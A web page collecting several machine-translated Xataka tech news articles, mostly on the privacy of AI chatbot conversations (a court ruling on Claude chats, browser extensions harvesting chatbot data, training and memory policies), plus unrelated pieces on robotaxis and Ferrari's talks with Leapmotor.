There are people sharing their court cases with AI. The problem is when a judge considers the conversations as evidence

More and more users have an AI chatbot as a companion for everything, whether ChatGPT, Gemini, Claudeor any other. The problem comes when we decide to share sensitive data with this type of tools, especially with commercial models produced by large technology companies where we will always have the doubt of where our data travels. In this sense, there are those who share their legal data with the assistant, which can lead to something like what recently happened in New York. And a city judge just set a precedent historical by considering that any conversation held with a chatbot is public and therefore not protected by attorney-client privilege. That is to say: everything you share with the AI ​​can end up being used against you in court. The case. Bradley Heppner, an executive accused of fraud worth $300 million, used Claude, Anthropic’s chatbot, to ask questions about his legal situation before being arrested. He created 31 documents with his conversations with the AI ​​and later shared them with his defense attorneys. When the FBI seized his electronic devices, his attorneys claimed those documents were protected by attorney-client privilege. Judge Jed Rakoff has said no. Because No. Just like share Moish Peltz, a lawyer specializing in digital assets and intellectual property, in a post on X, the sentence establishes three reasons. First, an AI is not a lawyer: it is not licensed to practice, owes no loyalty to anyone, and its terms of service expressly disclaim any attorney-client relationship. Second, sharing legal information with an AI is legally equivalent to telling it to a friend, so it is not protected by professional secrecy. And third, sending ‘non-privileged’ documents to your lawyer afterwards does not magically make them confidential. The underlying problem. As the lawyer recalls, the interface of this type of chatbot generates a false sense of privacy, but in reality you are entering information into a third-party commercial platform that retains your data and reserves broad rights to disclose it. According to Anthropic privacy policy In effect when Heppner used Claude, the company may disclose both user questions and generated responses to “governmental regulatory authorities.” Dilemma. The court document reveals Also an aggravating factor: Heppner introduced into the AI ​​information that he had previously received from his lawyers. This poses a dilemma for the prosecution, according to account Peltz. And if you try to use those documents as evidence at trial, defense attorneys could become witnesses to the events, potentially forcing a mistrial. What does it mean to you? If you are involved in any legal matter, according to this ruling, what you share with an AI can be claimed by a judge and used as evidence. It doesn’t matter whether you are preparing your defense or seeking preliminary advice, as each query can end up becoming a factor against you. And it does not only apply to criminal cases: divorces, labor disputes, commercial litigation… any conversation with AI on these topics escapes legal protection. And now what. Peltz points out that legal professionals must explicitly warn their clients of this risk. You can’t assume that people understand it intuitively. The solution he mentions involves creating collaborative workspaces with AI shared between lawyer and client, so any interaction with artificial intelligence will occur under the supervision of the lawyer and within the lawyer-client relationship. Cover image | Romain Dancre and Solen Feyissa In Xataka | Folding clothes or taking apart LEGOs has always been a tedious task. Xiaomi’s new AI for robots has put an end to it

We thought talking to ChatGPT and other AIs was private. We didn’t have these extensions stealing our conversations

There are matters that we would not publish on social networks or comment out loud. However, there they go, flowing in a waterfall of messages towards an artificial intelligence (AI) chatbot, as if it were our best friend. There are no glances, no judgment, no awkward silences. There are answers that, many times, are limited to proving us right or convincing us. But beyond that, an uncomfortable question appears: what if everything we have told could end up in the hands of a third party? What if there is someone else reading those conversations? Opt out in training models or maximizing the security of our account may not be enough. There is another threat that is reaching millions of users these days, and they may not even be aware of it: browser extensions that spy on and steal what is said to chatbots. At the top of the list is Urban VPN Proxy. A Chrome extension with more than 6 million users, rated 4.7 stars and that, until the publication of the cybersecurity report that we will talk about today, showed a “Featured” badge on Google, something that we can still verify in a version archived at the Internet Archive. The discovery. What has set off the alarms is a report published by Koia company specialized in cybersecurity. It is not a generic warning or a hypothesis, but the result of analyzing what these tools do in the background while we browse. When looking at popular extensions, the kind that are installed to gain privacy or security, their researchers detected a worrying pattern: some were capable of reading and sending conversations held with artificial intelligence chatbots outside the browser. A much larger attack surface. The investigation indicates that Urban VPN Proxy did not target a single AI provider, but rather a broad set of popular platforms. ChatGPT, Claude, Gemini either Microsoft Copilot appear among monitored services, greatly expanding the volume and diversity of data potentially captured. These conversations are not trivial: they often include intimate questions, financial information, or details of ongoing projects. Therefore, access to this type of exchange involves a very delicate level of exposure. How conversations are captured. According to the research firm, the mechanism does not depend on vulnerabilities in the chatbots themselves, but on the privileged place that the extensions occupy within the browser. Urban VPN Proxy monitors active tabs and, when the user accesses an AI platform, injects code directly into the page. This code intercepts the requests and responses exchanged with the server before the browser displays them on the screen, allowing access to the full content of the conversation in real time. What Urban VPN Proxy extracted were not jumbled fragments, but entire conversations with their associated context. Koi documents the systematic capture of user messages, AI responses, identifiers for each chat, and temporal data that allows them to be sorted and related to each other. This type of information, crossed over weeks or months, allows us to draw very precise usage patterns. From work habits to personal concerns, the value of the whole lies precisely in its continuity and not in a specific message. The content script that forwards the data It does not depend on activating the VPN. One of the most important nuances of the report is that conversation capture is not tied to the use of the VPN service itself. The mechanism, they explain, works independently, even when the VPN is disabled. It is enough to have the extension installed so that the code responsible for intercepting conversations continues operating in the background. There is no user-accessible switch that allows you to disable this collection without completely removing the browser extension. Conversation collection was not present from the beginning. According to the analysis, Urban VPN Proxy did not include this behavior in previous versions of the extension. The turning point comes on July 9, 2025, when an update is released that activates the capture of conversations with AI platforms by default. From there, any user with the extension installed and automatic updates activated began to execute that new code without an explicit notice comparable to the change in behavior or having to expressly accept that modification. What does “AI protection” promise? In the extension’s tab and in its messages to the user, Urban VPN Proxy presents this feature as an additional layer of security. According to its description, it serves to alert when personal data is entered into a chatbot or when a response includes potentially dangerous links. The problem is that this layer of notifications is not directly related to the collection of conversations. Activating or deactivating warnings does not prevent messages from continuing to be intercepted and sent to the company’s servers. The investigation did not stop at Urban VPN Proxy. By tracing the origin of the code and its behavior, Koi found that the same conversation capture logic appeared in other extensions published by the same publisher. Some present themselves as VPNs, others as ad blockers or browser security tools. Together, there are more than 8 million users between Chrome and Edge, which expands the scope of the problem and explains why researchers talk about an ecosystem and not a specific anomaly. Identified extensions for Chrome: Urban VPN Proxy 1ClickVPN Prox Urban Browser Guard Urban Ad Blocker Identified extensions for Microsoft Chrome: Urban VPN Proxy 1ClickVPN Proxy Urban Browser Guard Urban Ad Blocker Who is behind. Urban VPN Proxy is operated by Urban Cyber ​​Security Inc., a company linked to BiSciencea data intermediation firm, a data broker, as described by Koi. Koi recalls that BiScience had already been the subject of previous investigations by other cybersecurity experts for the collection and commercialization of browsing data. The report frames this case as an evolution of these practices, going from collecting browsing habits to capturing complete conversations held with artificial intelligence systems. The finding also puts the focus on how the user is informed. The extension generically mentions the processing of data related to AI services … Read more

It will allow you to have erotic conversations… if you hand over your ID in exchange

OpenAI has announced that in December it will lift restrictions on erotic content on ChatGPT for verified adult users. The measure comes after months of complaints about the chatbot’s loss of “personality”, especially after the arrival of the serious GPT-5and represents a 180-degree turn in the company’s strategy, until now reluctant in contrast to Grok. Why is it important. This is the moment when OpenAI recognizes that without emotional (and sexual) intimacy it cannot compete with platforms like Character AIwhere its users spend up to two hours a day talking to their AI-partner. Erotic literature has existed since writing has existed. ChatGPT does not invent anything. It simply bridges the last gap between “useful tool” and “total emotional companion.” The context. Sam Altman had declared in August that he was “proud” not to have turned ChatGPT into a sexbot. Now he justifies the change under the principle of “treating adults like adults.” The reality is more prosaic: after supposedly mitigating mental health problems (two months after a lawsuit for the suicide of a teenager who used the platform), OpenAI believes that it can now afford to relax controls. The money trail. Character AI proved that erotic is a great glue to retain users. If OpenAI wants to monetize the engagement Really, you need to enter that field. Personalization of the assistant (with options for more human responses, use of emojis or “friend” behavior) is just the wrapper. Adult content is the new product. Yes, but. The toll to pay is something unprecedented: OpenAI will require age verification, presumably with an identity document. It is the largest exchange of privacy for service that such a technological platform has asked of us. The question is not whether there will be leaks of databases with erotic conversations linked to real, verified identities. The question is when and how many millions of users will be affected. The turn. OpenAI is building the metaverse that Meta couldn’t create, or at least not successfully. Only this is not visual, but conversational. Meta failed because no one wanted to be in its virtual worlds. But we do want to be in ChatGPT. And more with the restriction-free mode for emotional companionship and eroticism. The summer’s stricter restrictions (designed to make the chatbot “less fawning” and prevent mental health crises) had pissed off users who didn’t have psychological problems. Now OpenAI reverses its own security philosophy in record time. You have introduced parental controls and a separate experience for minors, but the speed of change raises questions about whether they have truly “mitigated” the risks or simply decided to take them on. Between the lines. This move shows the real battle of conversational AI. It’s not about who has the most powerful model, but who gets you to spend the most time with it. And accompaniment without an erotic dimension is incomplete for many users. OpenAI knows this. Altman predicted that ChatGPT could “cure cancer one day.” Now bet that he can also be your sexual confidant. They are only two sides of the same strategy of total penetration in the lives of users. In Xataka | Character.AI is accompanying and making its users fall in love. That’s wonderful until it’s not. Featured image | Xataka

Our conversations with Claude were untouchable. Today the urgency of data presses to make them raw materials of the AI

We usually talk to artificial intelligence as if I were one more person and sometimes we trust very personal information. However, we rarely stop to think about what happens to those conversations. Until now, the standard in good part of the sector had been to use them to train models, unless the user opposed. Anthropic represented an exception: Claude He had an explicit policy not to use the conversations of his private clients for this purpose. That exception has just broken. The reason is direct and forceful: the data is the raw material of the AI. Anthropic has just announced in his official blog An update of its service conditions for consumers and their privacy policy. The users of the Free, Pro and Max plans, including the sessions in Claude Code, must explicitly accept or reject that their conversations are used for the training of future models. The company set the deadline until September 28, 2025 and warned that, after that date, it will be necessary to choose the preference to continue using Claude. The Anthropic turn. The modification does not affect everyone equally: services subject to commercial terms are left out, such as Claude for Work, Claude Gov, Claude for Education, or access by API through third parties such as Amazon Bedrock or VerTex Ai from Google Cloud. Anthropic states that the new configuration will only apply to chats and code sessions initiated or retaken after accepting the conditions, and that old conversations without additional activity will not be used to train models. It is a relevant operational distinction: change acts on future activity. Why this change? Anthropic points out that all language models “train using large amounts of data” and that real interactions offer valuable signals to improve capacities such as reasoning or code correction. At the same time, several specialists have been pointing to a structural problem: The open web is running out as a fresh and easily accessible source of informationso that companies look for new data paths to sustain the continuous improvement of the models. In that context, user conversations acquire strategic value. Although Anthropic emphasizes security (improving Claude and reinforcing safeguards against harmful uses, such as scams and abuses), the decision probably also responds to competition: OpenAi and Google remain references in the field and require large volumes of interaction to advance. Without enough data, the distances in the AI ​​race that we are witnessing live can increase. Five years instead of thirty days. Next to the training permit, Anthropic has expanded the retention period for shared data for improvement purposes: five years if the user agrees to participatecompared to 30 days that govern if that option is not activated. The company also specifies that the eliminated chats will not be included in future training and that the feedback Envoy can also be kept. It also states that it combines automated processes and tools to filter or obfuscate sensitive information that does not sell user data to third parties. Images | Claude | Screen capture In Xataka | Microsoft prefers its own 7 that a 10 of OpenAi. The 13,000 million invested in Openai have just gosses meaning

Streaming has been chasing shared accounts for years. The AI does not have that problem: our conversations embarrass us

Dylan Patel He has nailed it. He says he never paid for Netflix or HBO because he always parasitized alien accounts, but now he has subscriptions to Chatgpt, Perpleplexity and Gemini. And without sharing them with anyone. We have been watching Netflix, Disney, Spotify and company setting devices, home verification, SMS codes to verify that you are the one who pays, geolocation to confirm that you live where you say living. A surveillance device for Avoid cases in the ten relatives enjoy what only one pays. There is a lot of money spent on anti-comparting technology, they have eroded experience. And yet, the accounts continue to share. Total, what else does your brother -in -law know what have you seen ‘The squid game‘This weekend. With the generative AI, no control system is needed. Shame does all dirty work: Nobody wants a partner to discover that he asks ChatgPT to how to write a sad three -line mail. Nobody wants your partner to read the conversations at two in the morning where you consult what to do before a vital and intimate doubt. The history of a Chatgpt or Claude account is an intimate, professional and personal newspaper in equal parts. A record of many insecurities disguised as Prompts. Something too revealing happened recently: When Openai charged GPT-4o for the arrival of GPT-5 there was a small revolt. Too many people had become accustomed to a warmer and more empathetic chatbot (perhaps more servile and complicating), and did not want to lose it. Openai had to reculate. There were people confessing without shame that he needed to recover his digital confidant, to That imaginary friend who will be imaginary but does not judge or yawn. Who always has time and is able to remember every detail of previous conversations. The imaginary friend of the 21st century. IA platforms have discovered the perfect business model: you don’t need to spend money on locks when People prefer to pay before admitting to what extent it depends on a machine. Or let others see their intimacies. Netflix, Spotify and the rest will continue to invest a lot in complicating the lives of those who share their account. Openai only needs to continue believing that no one else talks to Chatgpt As you do. And they are right: nobody else asks him the same shameful things as you. That is why none share the account. In Xataka | Chatgpt has been a tool. If you start remembering all our conversations, it will be something else: a relationship Outstanding image | Solen Feyissa

Tesla trusts the Robotaxi as his next Milmillonario business. China is already in conversations to get ahead in Europe

Robotaxi is the business of the future in urban mobility. At least that is what technological giants such as Tesla, Google or Baidu believe and what some analysts have been saying for years. Although for now it is a business where profitability does not seem to be in sight, expansionist plans continue. And the next battlefield is Europe. That is what they claim from The Wall Street Journal. The American media ensures that Baiduconsidered the Chinese Google, works to try its vehicles without driver in Switzerland. Türkiye would follow the deployment and would be the first step to hit the table and position himself as pioneers on European soil. The information comes after Baidu has opened conversations with Swiss Post for Postauto, one of its units that provides the public bus service, has vehicles of this type on the street. If everything goes ahead, the goal is to start testing at the end of this year. The project with Türkiye, internal sources have affirmed WSJ It is similar. Objective: Be the first Putting autonomous buses on the market that can make trips for themselves without the intervention of a driver is a shortcut to open the way to a future robotaxis business. While in the United States and China, this business is being tested for a long There are active tests with busesa horizon for a robotaxis service in the street has not been completed. The problem of these services is that, for the moment, they are not generating any profitability. In the United States, General Motors burned so many Cruise tickets that he has preferred Cancel the project Despite having squandered billions of dollars along the way. Waymo’s success is partial because despite working in various cities in the country, its reach is small. And, at the same time, Tesla has also put all the machinery in motion to enter the market. However, the company’s own shareholders They have expressed their doubts on whether this must be the path that the company has to take. The project seems to have surpassed a more affordable Tesla, which has generated doubts. As to ChinaRobotaxis are much more widespread. In fact, Baidu operates in 12 different cities with its apologue service but Face Weride competition that is already available in eight cities, Pony.ai either Momenta that are in full phase of expansion. Given the competition and the hard challenge of profitable services, these companies are in full expansion to third countries. For example, Weride has already reached an agreement with Uber to integrate into its platform and offer trips with autonomous robotaxis in Abu Dhabi and Dubai. The objective is to take the service to 15 different cities in the future. In spite of everything, companies that want to enter the European market have it complicated. At the moment, European regulation is very demanding with autonomous vehicles and, in fact, Tesla herself has to save some functions In vehicles that are able to advance without a driver inside the park, offering a service cut in front of what they have on the street in the United States. For now, the closest thing to a robotaxi is what offers Mercedes. The company already has functions for the driver to completely disregard the car, as long as it circulates less than 60 km/h, the environment has previously mapped and the weather conditions are good enough. Despite doubts, as we say there are companies that see in this business a clear commitment to the future. Tesla has joined In the background to the business proposal of Waymo or Baidu, technological giants that aspire to develop their own software for autonomous vehicles and put them on the street associating with a large vehicle company that provides them with the hardware, that is, of the car in itself. The only difference with Tesla is that Elon Musk’s company can manufacture its own vehicles and with their own assembly chains and the acquired knowledge They aspire to earn more money working in vertical integration with proper vehicles and software development that stays at home. Photo | Baidu In Xataka | I have tried a totally autonomous taxi. This is traveling without driver

The mythical Italian brand has conversations with Leapmotor, according to Reuters

There are various views on Chinese leadership in the electric car. There are those who believe that the country lives years away from what we drive in the West right now (Ford’s CEO, without going any further). There are those who believe they are at the same level than European brands. And there are those who estimate that They are not yet found at the level In dynamic aspects but do not deny their present and future capabilities in loading systems or batteries. They are more or less optimistic visions of Chinese role in an industry where they were missing until the arrival of the electric car. But, from time to time, news that supports the most optimistic theory comes out. Well because they present cars recharges in record timebecause they demonstrate their Autonomous driving capabilitiesbecause Volkswagen Search Solutions in China for Audi’s future… Or because Ferrari holds conversations with Leapmotor to work on a future joint platform. Looking for solutions in China The information brings it Reuters Those who claim that Leapmotor, who now works partially under Stellantis’s umbrella, is having conversations with Ferrari for the launch of a joint platform. In his information, the news agency explains that we had already had news that Benedetto Vigna, CEO of Ferrari, He had visited Leapmotor Last February but we had not had news of these conversations. In them, unveiled now, a collaboration would be studying to carry out a new platform for electrified vehicles. Leapmotor only manufactures electric and plug -in hybrids that take the form of extended range electric. That is, they are cars that have a wide completely electric autonomy and that the main mission of the combustion engine is simply feeding a few kilometers plus the autonomy of the vehicle. In this type of carsthe combustion engine acts as an electric current generator. This allows to increase autonomy but maintain the sensations that we are using an electric car despite burning gasoline. Power delivery is linear because, really, the engine that rotates the wheels is electric. This structure, for example, can be seen in the leapmotor C10 to which we could already climb during the BRAND PRESENTATION IN MADRID. That day, we only got into the passenger seat, we did not have the opportunity to take the steering wheel but the Sensations They are good. This approach to supply electric or highly electrified platforms to luxury companies is a path that in Leapmotor is very interested in traveling. In fact, in the same information, Reuters points out that the company has reached a according to FAWthe oldest Chinese automaker, to nurture Hongqi from platforms, the Chinese luxury brand that was born to displace the top leaders of the Chinese Communist Party. It is something like your Rolls-Royce. The information is extremely sensitive because Ferrari is in full transition to pure electric. You need to launch a vehicle at brand. In the information Reuters He admitted that the company had refused to comment but, therefore, did not denied the information frontally. The movement is sensitive. In recent months we have seen how the electric car began to retreat among the wealthiest customers. It remains to be seen if the future, at least for the moment and in Europe, does not go through the extended range electric, a solution for which also Mazda has said that he wants to bet In the future. Even from Volkswagen have also pointed out Its importance recently despite being an almost missing option on the market. Until now, Ferrari’s electric future It is an unknown. Secretism about a future electrical model is total and no detail is known for sure. Photo | Ferrari and Leapmotor In Xataka | “Imagine Toyota by pulling millions of cars”: Ferrari is bound with his hybrids marking record figures

Chatgpt has been a tool. If you start remembering all our conversations, it will be something else: a relationship

A few days ago, Openai announced an “memory” update for chatgpt: You will begin to remember all our conversations Already take them into account when giving us an answer. No four inferred pieces as before: All our history. Well, it wasn’t even Openai who announced it. Was Sam Altman in Xas who does not want the thing. Openai focused those days on giving a court to a GPT 4.1 Much less transcendent for the user. And a few days later, Grok announced the same movement. The new super memory (not yet available to the European Union) is a total change in the use we give to Chatgpt. And to a lesser extent, to Grok, who does not have a lower professional utility. We are no longer facing a tool that we use and abandonbut before a digital entity with which we have an evolutionary conversation. A relationship. Let’s think about how we use a hammer, a calculator or even Google: we use them to solve a problem and then forget them until the next time we need them. There is no evolution in our interaction with them. On the other hand, our relationship with another person is contrasted on a cluster of previous interactions. We do not expect to have to remind a friend what team we are, or our partner what music we like. There is something deeply human in wanting to be rememberedto desire continuity in our interactions. The IAS that offer this experience will have an advantage not only technical and functional, but also psychological. Each conversation with chatgpt – at the margin of the utility of the GPTS– It will no longer be an eternal first day, but the continuation of a thread of shared knowledge. An assistant who remembers your allergy to nuts. Which understands that you like explanations with sports analogies. Who knows that you are working on an important personal project. On face B of the album, the concerns that it provokes to deposit so much about ourselves in an entity controlled by a company. Persistent memory offers extreme customization, but it also costs us A privacy toll. Openai says that you can deactivate this function, but the value of the service decreases if you do. It is a usual dilemma for any user of modern services. It will also exist for some The subtle temptation to replace human interactions – Sometimes frustrating – for more predictable interactions with an AI designed to please us. The AI ​​never tired, never has a bad day, never judges our repetitive questions or laughs if we ask something too basic. It is an idealized company version that could be too attractive to some, especially for those who feel alone. It is the first stone of A new type of software that asks for another type of relationship. And we are not accustomed to something like that. It is not useful to treat it as another human, but neither as the classic tools. Another conceptual category will need. Chatgpt will know us better than many of our friends and family. It will be something that maintains the thread of our thoughts throughout weeks, months and years. A constant presence that will evolve with us, which will even anticipate our desires. Chatgpt will no longer be a tool, but something much more intimate and personal. Almost alive. Outstanding image | Xataka In Xataka | Openai’s hypothetical social network does not want to connect people. Want your data to train your AI

Grok will also remember all our conversations with him. The new generative AI tendency is already here

XAI, Elon Musk’s company, has announced The incorporation of a memory function for its Chatbot Grok, which can now remember details of past conversations to offer more personalized answers. Why is it important. Memory integration is a huge step in the evolution of the AI ​​attendees, transforming them to tools for specific tasks to digital partners who learn and adapt over time. This update reduces Grok’s gap with its rivals. Chatgpt It has been offering a similar but newly improved function for some time to be able to refer to the entire user conversations history. Gemini also has persistent memory to customize your answers. In detail. This new function allows the assistant to retain previous interactions information. You will remember whether we told him that we only want to use Python to program or if we ask for advice to improve running from concrete MMPs. The function is available in beta through Grok’s website and its mobile applications, although it is not yet accessible to users in the European Union or the United Kingdom. The context. Grok 3 already stood out for its speed and intelligence, but as we said at the timeIt lacks elements that make it attractive to recurring and professional use, compared to competition options. I had nothing similar to projects, GPTS either Gems. It still does not have it, but at least now it goes further in product development with a persistent memory. Between the lines. The implementation of memory implies a huge change in human relationship. It allows you to move from the unique and state consultation model that characterized the first systems of AI towards more continuous relationships that are built over time, which they remember. The AI ​​attendees go from being specific tools to becoming digital partners who know our preferences, history and needs. How it works. XAI has emphasized transparency In memory management, allowing users: See exactly what information Grok remembers. Disable the function from the configuration. Eliminate individual “memories.” And now what. The question is whether Grok is going to get thanks to this novelty differentiates himself in an increasingly competitive space or if he will be relegated to punctual anecdote in a saturated market. Xai still has to show that Grok can make something differential and real useful on a day -to -day basis, not only in specific uses closest to hobby. This is a great step in that direction. Outstanding image | Grok, Xataka with Mockuuups Studio In Xataka | Founders of small startups and large technological ones already has something in common: they are millmillonarios thanks to the AI

Log In

Forgot password?

Forgot password?

Enter your account data and we will send you a link to reset your password.

Your password reset link appears to be invalid or expired.

Log in

Privacy Policy

Add to Collection

No Collections

Here you'll find all collections you've created before.